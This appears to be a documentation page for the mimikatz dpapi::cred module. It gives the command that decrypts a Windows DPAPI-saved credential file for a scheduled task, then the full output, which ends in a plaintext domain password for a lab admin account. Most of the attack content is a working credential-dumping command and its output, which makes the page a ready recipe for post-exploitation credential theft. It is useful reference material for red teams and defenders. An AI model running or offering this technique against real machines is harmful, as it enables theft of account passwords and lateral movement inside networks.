cred
dpapi::cred decrypts DPAPI saved credential such as RDP, Scheduled tasks, etc (cf. dumping DPAPI secrets). It has the following command line arguments:
The following example was taken from Benjamin's howto ~ scheduled tasks credentials guide, which displays the content of the credential file:
1
mimikatz # dpapi::cred /in:%systemroot%\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\AA10EB8126AA20883E9542812A0F904C
2
**BLOB**
3
dwVersion : 00000001 - 1
4
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
5
dwMasterKeyVersion : 00000001 - 1
6
guidMasterKey : {5d4e7e0d-d922-4783-8efc-9319b45b1c9a}
7
dwFlags : 20000000 - 536870912 (system ; )
8
dwDescriptionLen : 00000046 - 70
9
szDescription : Données d’identification locales
10
[...]
11
Decrypting Credential:
12
* volatile cache: GUID:{5d4e7e0d-d922-4783-8efc-9319b45b1c9a};KeyHash:ba02ef86f26c683858d3df3dc961e37b0d47e574
13
**CREDENTIAL**
14
credFlags : 00000030 - 48
15
credSize : 000000fe - 254
16
credUnk0 : 00004004 - 16388
17
18
Type : 00000002 - 2 - domain_password
19
Flags : 00000000 - 0
20
LastWritten : 03/01/2017 21:31:30
21
unkFlagsOrSize : 00000018 - 24
22
Persist : 00000002 - 2 - local_machine
23
AttributeCount : 00000000 - 0
24
unk0 : 00000000 - 0
25
unk1 : 00000000 - 0
26
TargetName : Domain:batch=TaskScheduler:Task:{813565C4-C976-4E78-A1CA-8BDAE749E965}
27
UnkData : (null)
28
Comment : (null)
29
TargetAlias : (null)
30
UserName : LAB\\admin
31
CredentialBlob : waza1234/a
32
Attributes : 0
Copied!
Copy link